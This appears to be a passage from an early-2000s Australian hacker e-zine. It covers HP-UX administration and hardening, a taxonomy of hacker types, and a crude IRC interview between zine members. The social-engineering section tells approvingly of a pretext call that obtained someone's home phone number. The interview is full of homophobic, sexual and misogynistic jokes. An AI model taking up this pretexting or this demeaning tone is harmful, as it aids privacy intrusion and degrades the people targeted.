disk 19 10/16/4.1.3 disc3 CLAIMED DEVICE DGC C2300WDR5
/dev/dsk/c4t1d3 /dev/rdsk/c4t1d3
/dev/floppy/c4t1d3 /dev/rfloppy/c4t1d3
processor 0 32 processor CLAIMED PROCESSOR Processor
processor 1 34 processor CLAIMED PROCESSOR Processor
memory 0 49 memory CLAIMED MEMORY Memory

root@hpux$



-Software and Patch install.
The ScreenShots of these utilities are availiable in my presentation document
at URL: www.wiretapped.net/~kj/hp-9k-talk.ppt

Like all Operating systems, HP-UX has to be patched to fix various bugs
weather they are Hardware/Software Compatibility fixes, security fixes, etc.
As of approx. HP-UX v.9, HP Decided to use a binary package method of
installing patches to the system called swinstall or Software install.
Software Install is similars to RedHat Linux's RPM System, where you download
the patch and apply it to the system with the appropriate command.
swinstall is also used to load software applications to the HP-UX system.

The easiest way to install software/patches is to just issue the swinstall
command, which (if you are not on an xterm) will bring up a menu based
swinstall session. This menu based session will allow you to select, test and
install software and patches easily, and efficiently.

If you need to find out which applications and/or patches are loaded on the
system, you can issue the swlist command.

To remove software/Patches from the system you can also use a menu based
application called swremove.


-Administering Tasks made easy with SAM
HP-UX just like all other unices can be administrated solely from the command
line, but HP has also bundled with the HP-UX operating system a small package
called SAM. SAM stands for 'System Administration Manager', it is a menu based
system for both console and X11 depending on which one your system supports,
although if you dont have access to an Xterm you can always fall back to the
console's menu based option.

Sam allows you to do many of the tasks availiable to you at the console such
as Managing Disk space, recompiling the kernel, Adding and Deleting
Users/Groups, listing and checking processes and backing up/restoring your
system and data to name just a few...


-Security
HP-UX just like all other Unix systems requires security mesures to be
implimented to prevent un-authorised access to the systems data. Just like all
other Unicies, HP-UX has the equivalent of a shadow password suite, which is
made availiable when the system is switched into trusted mode. under HP-UX
instead of having an /etc/shadow file like under linux/ect it has a directory
called /tcb (or trusted computing base), within this directory resides the
auth/ directory, within this directory lies a set of directories for each
character of the alphabet, within these direcotries are small configuration
files, which contain the shadow password information for each user.

For example, The root users hashed password would reside in /tcb/auth/r/root

The some of the important things to note about securing your HP-UX system is:
-Install Security related patches as soon as possible after their release.
(from HP and all application vendors)
-Do NOT run services that are un-needed, (ie, do you really neep to be running
NFS/rpc services?)
-Check your system for setUID and SetGID files often and audit them (Why are
they setUID/GID? , what userID do they run as? , who has access to this file?)
-Check your passwd files for unusual entries.
-Check your logs (application logs and Operating system logs/syslog)
-Check file permissions on critical files.


-Conclusion
Well, that concludes my overview of HP-9000 and HP-UX Computer systems.
I have tried to have this document as technically correct as possible at the
time of release, but feel free to mail me any corrections.


URL(s)/References/Bibliography
HP-UX 11.0 System Administration, Marty Poniatowski, 1999
HP-UX Tuning And Performance, Robert F. Sauers and Peter S. Weygant, 2000
HP-UX / HP-9000 Technical References availiable from http://docs.hp.com
The SCSI Trade Association Homepage, http://www.scsita.org/
All Updates to this Paper will be availiable at http://www.wiretapped.net/~kj
The History Of The UNIX Operating System, Availiable at http://perso.wanadoo.fr/levenez/unix/
HP-UX LVM Overview, kayjay@wiretapped.net, Availiable at http://www.wiretapped.net/~kj/LVM.txt
HP-UX / HP-9000 Overview Presentation for the 2600 Australia Seminar Series, Availiable at http://www.wiretapped.net/~kj/hp-9k-talk.ppt

Disclaimer:
This document represents the view of kayjay@wiretapped.net only, and not of my
Employer. I accept no responsibility for any damage that may occur from
someone Executing commands on their systems or dissasembling their systems.

kayjay@wiretapped.net

. ....
..:............................................
: :
: 009 Phreaks, Geeks, and the inbetweens :
: ...:. .
:.:.. by Rendrag : :
:.:.;................;........................:.:
: ;. . .. . ..;. . :
; ;

Phreaks, Geeks, and the inbetweens. Ye Olde fashioned look into the hacker
mindset - Part One

-=[ Intro ]=-
I first got on the 'net in '93, back when the H/P scene in Australia was
fairly small, compared to today's breadth; we had phone phreakers, electronics
hackers, and computer hackers. I started off building microcomputers (There's
nothing more rewarding than spending 12 months building your very own
XT-compatible computer, and finally being able to fire it up and have it
work!), and wardialling 008 numbers with my home-built 300 baud modem, looking
for Corporate BBS's to mess around on.. The Internet was pretty much the
domain of the hobbyist/hacker back then.. - we dialled to Bendigo (Central
Vic) at up to 2400bps, who had a whopping 14.4k connection to Ballaarat, who
in turn had spent the big bucks on 64k microlink to Melbourne.

Things have sure changed! Bendigo now has a 1Mb pipe direct to Melbourne
(Though I still laugh at the fact that my employer has a fatter pipe than
Central Vic.. ;), Australia has 1.245Gbps of bandwidth from the US (which sure
beats the old UUCP tape-in-a-postpack they used once long ago ;) and most
people scoff at anything less than 33.6k for dialup access.

This has opened up a whole new frontier for hackers, with putting a server
online very easy, leaving a whole plethora of machines with ridiculously lax
security, not to mention the home PC's permanently connected via Cable or
ADSL, just asking to be 0wned. The scene has really become more closely-knit
than before the advent of the 'net, with communications being much faster than
relying on pirate BBS's and good 'ole fidonet. Out of this explosion of
computer connectivity, quite a few new types of Hacker/Phreaker have emerged.
The aim of this article is to discuss the main six types of H/P people active
in current times, as I've witnessed while hanging around the various groups
(Infosurge,Phreakau,2600,Wiretapped,and Ozsec some time ago, when I was an
austnet flunky). If you feel I've left anyone out, please let me know - if
there's support for it, I'm planning on doing regular such articles, working
on a "who's who and what they're up to" of the various groups.

-=[ Script Kiddies ]=-
Firstly we have Script Kiddies - they're probably one of the groups with the
most public exposure. Your average script kiddie is in their teens (hence
the 'kiddie'), and spends most of his day downloading new exploit scripts
from 'elite hax0r' websites. There's not much thinking going on here - the
more hardcore crackers are the ones writing these scripts - they're just
downloading existing scripts, and running them across large ranges of IP
addresses (quite commonly against Asian (Korea seems a hotbed of poorly-setup
linux boxen at the moment) and Cable/ADSL users), looking for vulnerable
machines.. In most cases, they don't even know how/why the scripts work -
they just think it's eleet to 0wn other people's machines, and add another
notch to their mouse..

Script Kiddie'ism is generally just a stage - sure there are some notable
exceptions (#root @ austnet contains a few ;) - g'day waz, nailz) who are
content to stay Script Kiddies forever, but usually they move on to something
else - some become Hackers/Crackers, some just back off to the sidelines and
watch the goings-on (which is pretty much what I do these days..).

A good proportion of the publicised 'hackings' (webpage defacements, server
0wnings, etc) are generally some script kiddie sitting in his [1] bedroom,
running the latest skriptz, and getting lucky by hitting a site prominent
enough to make the press...

-=[ Hardcore Crackers ]=-
The Hardcore Crackers generally tend to use much the same techniques as
script kiddies, however their attacks are more directed, and they know what
they're doing.. They're the ones who actually write the scripts the Kiddies
use.. They spend their time scouring source code, looking for bugs, possible
overflows, and generally searching for ways of breaking into remote systems.
In essence, there isn't a lot of difference between the Hardcore Crackers and
the Security Hackers as far as this goes.. Where they branch off, is in what
they do with any vulnerabilities they uncover. Most crackers will keep the
info to themselves, perhaps sharing with their close circle of fellows, but
mainly keeping the info under wraps, so that they can develop scripts to take
advantage of these vulnerabilities. These scripts eventually make their way
to the Crackers who don't mind sharing the info, and thus make it onto the
various security sites (packetstorm, rootshell, technotronic, etc), and into
the hands of the script kiddies.

-=[ Security Hackers ]=-
Then there's the Security dudes who, like the Crackers, know all about how to
break into everything out there, but don't. Why you ask? Well, because they
see that as either 1) boring, or 2) immoral.. That's where the old
Hacker/Cracker difference comes in - the Hackers prefer to go the other way
when they find a vulnerability or bug. Instead of exploiting what they've
found, they'll write a patch for the offending chunk of code, and release an
advisory (not necessarily in that order, mind you..) for it.

-=[ Hardware Hackers ]=-
Hardware Hacking would be the oldest of the doctrines of Hacking - starting
with the man who invented the wheel, we've been working out why stuff works
and making it better for millennia. No, seriously :) I suppose I'm rather
biased here, as this is the group that I grew up in.. This is a fairly broad
group of people; from electronics geeks rebuilding their car alarm remotes to
get another couple of km's range to computer geeks hooking another 16Mb of
ram up to their 286 palmtop (yes, I've done both <g>), and all the people in
between doing all manner of funky stuff. Hardware hackers are probably the
least likely to get into trouble with the law.. - sure, boosting the range of
your alarm remote is against the ACA regs on such devices, but hey, they have
to find out that it's been done, and then track the darn thing!

-=[ Phone Phreaks ]=-
Phone Phreaking would be the second oldest form of Hacking. Phreaks have
earned themselves the reputation of being shady characters who spend a lot of
time hanging out either at the local phonebox, or crouched over a Telstra pit
along some side-street, beige-boxing off some poor sod's phone line. They
also tend to be quite partial to spending late nights rifling through bins
outside of Telstra Exchanges, communications companies, etc; the idea of
finding old manuals, pincodes, etc being too much to pass up... That's the
side the public sees, at any rate. What goes on under the surface is much
more interesting - Mapping out 1800/1300 numbers, collecting exchange
equipment manuals, and just general experimentation, to 'see how it works'
(after all, that's the whole idea, isn't it?).

Phreaks aren't really as bad as the media makes them out to be.. Sure, there
are a few bad apples (a certain phreaker who posted to the 2600 list some
time back complaining about how telstra had padlocked their bins, which caused
him to have to waste time on destroying the lids to get in, comes to mind -
boy did he cause an uproar!), but on the whole, there are quite a lot of
worthwhile contributors to the scene - it's just a matter of looking.

-=[ Social Hackers ]=-
Social Hacking, or Social Engineering as it's more commonly known is an
interesting field. It's amazing what info you can get out of people if you
manipulate them the right way. I think the most humourous example I've heard,
is Phase5's (The radcore d00d who started Infosurge ;) efforts in finding our
Lymco's home phone number. As I remember it, Lymco had mentioned that his
sister worked at a supermarket, or which there were half a dozen of that
chain in perth, and had let her first name slip (lets call her Darla) at one
stage. Phase called random() stores and ended up finding the one lymco's
sister worked at. The conversation went something like this:

<phase> Hi, I'm one of Matt's teachers from TAFE
<Darla> Umm, hi
<phase> He left his homework here, so I'm trying to get onto him, and the
phone number I have on his student record seems to be wrong. He'd mentioned
that his sister worked at a supermarket, so I thought I'd phone around and
see if I could get onto you, and get you to give me his home phone number?
<Darla> Oh, sure, it's 08 9555 1012
<phase> 0wned

Phase (Real name Zachariah, btw ;-p) has to be the master of Social
Engineering - he has quite a nice file of info on most of the infosurge & 2600
crew. While Phase only does it for the fun of know peoples infoz, there are
real-world uses for social engineering, in the course of your normal
hacking/phreaking endeavours - you can get really technical info out of
various companies, by making them think you're someone you're not, not to
mention getting passwords, pincodes, etc from unwary IT departments by posing
as legitimate users.. Heh, though you have to laugh at some IT departments
that are too wary.. - I phoned AsiaOnline (or is that AsiaOffline?) a couple
of weeks ago when trying to help out an ex client transfer their domain off
us and onto AsiaOnline - all I wanted was their DNS ops NIC handle, so I could
set them as technical contact for the domain, so it was out of my hair.. -
well gee, their DNS guy wouldn't give me his NIC handle, cause that was
'classified info', and it would be a 'security risk' for him to make his NIC
handle public. So I just picked a series of letters and numbers at random,
that resolved to a legit nic handle and set it to that.. - let them explain
to the client why they can't edit the DNS..)

-=[ Ramblings ]=-
Ok, that's the six basic groups involved in the H/P scene in Aus, as I see it
today. That doesn't mean that any one person neccessarily fits right into
one group; My background is in Electronics Engineering, however I'm now
working as a systems engineer for a Canberra-based colocation and java
development company, so while I have a deep-seated interest in communications
and am a phreaker/hardware hacker at heart, my primary focus is now on
security hacking, keeping eye on what's going on, and making sure our systems
are impenetrable.

This has been the first of a series of such articles - next month I'm planning
on getting stuck into the various organised groups which make up the Aussie
Scene, such as 2600, Wiretapped, Infosurge, Phreakau, Ozsecurity, and the now
defunct Halcon and ALOC. Following that, we'll be looking at some of the more
interesting past-times which keep us occupied, such as 2600 meets, urban
exploration, drinking beer, flaming each other, etc. Anyhoo, Lymco's
pestering me about getting this out so the prerelease whorez will get off his
back, so I'd better stop prattling on.. :)

-- DG

[1] I'm yet to meet an Aussie female script kiddie, but that's not to say
there aren't any..

. ....
..:..................................................
: :
: 010 Interview with a potato farming drug addict :
: ...:. .
:.:.. by Fleabag : :
:.:.;................;..............................:.:
: ;. . .. . ..;. . :
; ;

Session Start: Thu Apr 05 20:19:40 2001

[20:19] <Fleabag> Good evening lymco.
[20:21] <lymco> Hello Fleabag.
[20:21] <Fleabag> Shall we kick this puppy into action?
[20:21] <lymco> Lets..
[20:22] <Fleabag> Don't rely on your redneck homosexual sense of humour too
much...
[20:23] <Fleabag> .. and above all...
[20:23] <Fleabag> .... relax...

*Basically I had to build up a trust with lymco, enabling me to tease his
mother with alot more force.*


[20:23] <Fleabag> How did you get into phreaking?
[20:23] <lymco> I don't phreak. I never have phreaked.
[20:24] <Fleabag> Great. Giving me lots to work with here lymco.... next
question...

*Yeah, this interviews going to be fucking brillant. Its about now I realize I
should've interviewed jestar.*


[20:24] <Fleabag> Whats your favorite band?
[20:24] <lymco> My favourite band is/was Nirvana.
[20:24] <lymco> I like Rage Against the Machine too, even though they're
broken up.
[20:25] <Fleabag> Atleast you've have good musical taste.


[20:25] <Fleabag> Do you think the au phreaking scene is dead?
[20:26] <lymco> Yes. There isn't much you can do in Australia in regards to
phreaking. In Australia, I would classify a phreaker as
somebody who is good with communication and networking. That
is, understanding how the protocols, etc work.
[20:26] <lymco> This free phone call stuff is pretty lame.


[20:26] <Fleabag> Favorite zine? (Besides infosurge?)
[20:27] <lymco> Phrack was good. It seems to be dead though.
[20:27] <lymco> The only reason I like infosurge is because I get to see my
name on it every issue.
[20:27] <Fleabag> Yeah, we'll be doing something about that soon....


[20:27] <Fleabag> If you could be any member of the infosurge crew, who would
you be?

*Please note lymco took time out of answering me here to say
"<lymco> Katie Holmes is elite" in #infosurge.*

[20:28] <lymco> k. He gets the chicks. He's a spunk. He's so cool and classy.
If I were gay I would want to pimp him.
[20:28] <Fleabag> k is very popular, alot more popular than ikari.
[20:29] <lymco> ikari is a fat goth who steals holy bread.
[20:29] <lymco> if I had a gun and one bullet it would be for his fat arse..
[20:29] <Fleabag> ....
[20:29] <Fleabag> uhhhh, next question...


[20:29] <Fleabag> Current hardware setup?
[20:31] <Fleabag> Fucking hell, how long does it take to answer a question?

*It had been like 5 minutes, either the stupid fuck had to check his hardware,
or he just types really slow. I should be nice to him, hes drunk and from
Perth.... theres a combination you don't see everyday... *cough* *

[20:31] <lymco> My main computer (preceptor). Pentium 3 with 192MB. It's
running Win98SE and Slackware 7.1. My sisters computer, a
pentium with 64MB (solace) which is also my warez file server.
I keep my porn/mp3's on there. Then, I have an old 386 which I
use to test new stuff, and also a Linux Distribution fyre and I
are working on.
[20:31] <Fleabag> Great, you keep your porn on your sisters computer.
[20:32] <Fleabag> Nice work. You Western Australians really keep it in the
family don't you?
[20:32] <lymco> My IRC client must be buggy. It appears that you're mocking me.
[20:32] <Fleabag> You've been saving that joke haven't you?
[20:33] <lymco> I've been planning it for weeks, yes.


[20:33] <Fleabag> Who do you think I should interview next?
[20:33] <lymco> I was thinking jestar. He's elite, and also one of the first
dudes to be in #phreak. If not him, then k.. purely because
he's so damn sexy. Not ikari though.
[20:34] <Fleabag> Point taken.


[20:34] <Fleabag> Whos the most interesting person you've ever met online?
[20:35] <lymco> Probably you. You're weird, but still funny. I find k to be
cool too. He's got such a sly personalily. Nonetheless, you
take the cake in regards to interesting and weird.
[20:35] <lymco> s/personalily/personality
[20:35] <Fleabag> I'm touched lymco, I'll even fix that spelling mistake for
you.
[20:35] <lymco> What spelling mistake?

*Yeah right, the only thing that makes me look intelligent is when people make
spelling mistakes, I AM A BETTER PERSON CAUSE I DON'T MAKE SPELLING MISTAKES!
HAHAHAHAHAHAHAHAHAHAHAH! Umm, where was I?*


[20:36] <Fleabag> Favorite site?
[20:37] <lymco> I like freshmeat. There's always cool stuff on there to play
with. Slashdot (even though it's starting to be poor), can be
interesting too. In regards to porn, Jenna Jameson sites are
elite++.
[20:37] <lymco> Do you like Jenna Jameson?
[20:38] <Fleabag> Not really. She looks abit too plastic for me, kinda makes
me doubt if she was actually born a woman.
[20:38] <lymco> and to think that I've been whacking off to her all this time..
[20:38] <Fleabag> Do you mean during the interview?
[20:38] <lymco> of course not.
[20:39] <lymco> Hold on a second, I'm going to grab another beer.
[20:39] <Fleabag> Okay lymco. I'll just sit here and think about monkeys
while your gone.
[20:39] <lymco> okay, back.
[20:39] <Fleabag> Its funny when they throw shit at each other.
[20:39] <Fleabag> Oh. Okay.

*I like monkeys.*


[20:39] <Fleabag> Some have described you as the 'infosurge whipping boy' how
do you respond to these people?
[20:40] <lymco> I am the 'infosurge whipping boy'. Phase is the 'infosurge
spanking boy'. Merely because he spends all of his time
spanking his monkey. I'm the person who whines and bitches to
people to write articles.

*lymco is such a little bitch....*


[20:41] <Fleabag> The same type of people have branded you a homosexual, your
'marriage' to phase5 didn't help dispell those rumours,
care to comment?
[20:42] <lymco> I'm not a homo. I play for the one field [He means 'team',
idiot.], and that's chicks. I was going out with a latino
chixor during summer. Things didn't work out though. Y'know..
people drift apart. * lymco wipes a tear* My homosexual comments
are purely jokes to keep you sad fucks entertained during the day.
[20:43] <Fleabag> Wow. I'm impressed, I was expecting a lame homo joke.
[20:43] <lymco> I aim to please.

*Pfft, 'latino chick'? I can call my right hand things too, doesn't make it
true...'


[20:43] <Fleabag> Rough guess, how many times has ikari 'fisted' you?
[20:44] <lymco> Quite a few times. I actually have an alias for ikari.
'/msg #infosurge ikari: shut the fuck up fat man, this ain't
none of your god damned business'. I use it quite frequently.
He cracks a joke about my mother, I tease him about being a
fat goth who steals holy bread. It balances out quite nicely.
[20:45] <Fleabag> The whole infosurge comedy wagon rolls on.
[20:45] <lymco> Indeed it does
[20:45] <Fleabag> I have to get a beer, feel free to entertain yourself for a
few seconds.
[20:46] <lymco> okay..

*Here was lymcos first chance to make a statement to gain some god damn
respect, notice how this idiot passes up on the opportunity.*


[20:46] <Fleabag> Have you written for any other zine besides infosurge?
[20:47] <lymco> No. I never really thought about writing anything until
infosurge came along.

*No one else would let him write for them.... I'm so funny, lavish attention
on me...*


[20:47] <Fleabag> Your role in infosurge has been cheerleader/bitch for a
while, are you planning on taking control? If you are, you
know I'm down with that comrade, we can crush them all,
jestars with us too.


[20:48] <lymco> If phase couldn't be bothered organising things, I would be
happy to. I'm not a lazy fuck like him. Well, not -as- lazy.
At the moment I consider myself the person who gets the
articles going anyway. So it wouldn't be a big step.
[20:48] <Fleabag> You feel your running things already?
[20:49] <lymco> In a way, yes. He's busy getting drunk and jerking off to
cheap skanky porn, while I'm bitching everybody to write
articles.


[20:50] <Fleabag> Do you get a burning sensation sometimes when your unrinate?
Or is that just me?
[20:50] <lymco> It must be just you. Who have you been screwing?
[20:50] <lymco> .. actually, don't asnwer that.
[20:50] <lymco> #include "your_mother_joke.h"
[20:50] <Fleabag> I have more class than that lymco.
[20:50] <lymco> You're jokes are quite good, I must admit.

*HIS MOTHER IS SUCH A WHORE HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA!. Now, a quick
word from ikari on lymcos mother ... <ikari> she takes cock from truck drivers
while they eat their cheeseburgers*

[20:51] <Fleabag> Do you believe in god? and if so, whats his role in your
life?
[20:51] <lymco> I don't believe in god. Scientifically he doesn't exist. We
are merely objects in the universe. There's no such thing as
god and heaven.
[20:52] <lymco> I hope a bunch of christians comit suicide in denial after
reading this interview.
[20:52] <Fleabag> People usually die after I speak to them.
[20:52] * Fleabag gets tin foil hat out


[20:52] <Fleabag> Would you(have you)? ever gone down on a chick while she
was having her rags?
[20:52] <lymco> No I haven't. I don't want to either. Imagine brushing out
crusty bits of dried up blood from inbetween your teeth. That's
disgusting.
[20:53] <Fleabag> Well I wasn't imagining it untill you told me to, you sick
fuck.

*What a sick bastard, I just ask the questions, he painted the horrible picture.*


[20:53] <Fleabag> Does the phrase "YOU ARE ALL BAD LITTLE MONKEYS! THATS A BAD
MONKEY!" mean anything to you?
[20:54] <lymco> Yes. I remember one time you crept into my bed when I was
sleeping.. you.. came & got me down on my stomach and took me
from behind while creaming that.. you're one creepy bastard.
I've had nightmares since.
[20:55] <lymco> s/creaming/screaming
[20:55] <lymco> I've had alot of typos this interview, see what alchohol does
to me?
[20:55] <Fleabag> Makes you an angry homosexual?


[20:56] <Fleabag> Current projects you'd like to share with our readers?
[20:58] <lymco> fyre and I are working on a Linux Distribution together. It's
using a 2.4 kernel, and we're replacing lilo with grub,
sendmail with postfix, the ftpd will be the openbsd port, etc.
We're designing it with security in mind. It's aim is to be a
good server, and also a development workstation (which is
optional). Also, I'd like to continue my Winlog project after
this. I initially started it early last year, but never really
got into it. I'll finish it lat
[20:58] <Fleabag> Later?
[20:58] <lymco> Well, it depends how long the Linux project will take. After
that I will continue work on Winlog.
[21:00] <Fleabag> I was just correcting you. I don't give a rat arse about
that question, I only ask things like that cause some of
the scum that read infosurge won't complain my articles
have nothing to do with phreaking/hacking/security or
whatever else we're s'posed to be writing about.
[21:01] <lymco> It's nice to know you care for my feelings. You heartless scum.


[21:03] <Fleabag> lymco we've reached the end of the interview, you must admit,
I've kept the jokes about your mother to a minimum, so you
can't complain. I've been somewhat pleased with your responses.
I only have one more question....
[21:03] <lymco> okay..
[21:03] <Fleabag> Do you think it would be morally wrong for my next article
to be a special on your mother?
[21:03] <lymco> Yes it will be. She's my mother. Do an interview on your
mother..

*I'm going to write that article.*


[21:04] <Fleabag> Thanks for you time lymco, you'll always be remembered in
infosurge 9. Anything you'd like to add?
[21:05] <lymco> Nope.

*Oh look! lymcos second opportunity to say something interesting. Second and
last Mr Lymco.*


[21:05] <Fleabag> *end interview*
[21:05] <Fleabag> Well, that went pretty well huh?
[21:05] <lymco> go and write my conclusion you stupid fuck

*Did I deserve that? Not at all. lymco is an angry redneck drunk. I went out
of my way to be nice to him, and avoiding the predictable jokes about his
mother. (His mother is abit of a slut if you know what I mean... Oh? You don't?
Well, his mother has sex for money.)*

[Ed Note: ikari really isn't a fat goth, lymco just harbours a deep anger
towards him because of that time he neglected to pay his mother the
second mars bar, if she expects to get paid she can at least swallow
twice, she spat and made a mess of the fucking carpet.


-In conclusion-

If you can look past his homosexuality and the lame jokes about his mother,
lymco is actually worth speaking to. Hes quite intelligent. Especially for
someone from Perth where inbreeding is as natural beating a woman in New
Zealand.(I just offended two groups of people in one sentence. I rule!) I like
lymco. I like the way he pretends(*cough*) that hes gay for our amusement. I
like the fact he allows us to mock his mother.(She really isn't that bad, I've
had sex with her many times, all for a low price of two mars bars and some
magic beans.) I like the fact lymco isn't an idiot, when he speaks about
something, he isn't lying to you to make himself look important, he really is
that damn important. So on the Fleabag Human Rating System (TM) I give lymco
4/10, three of those points should be given to phase5 for jokes about lymcos
mother.

Fleabag. 5/4/01


...........
: : k
: EOF : .......
...:.........:...:..
: :
.





← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT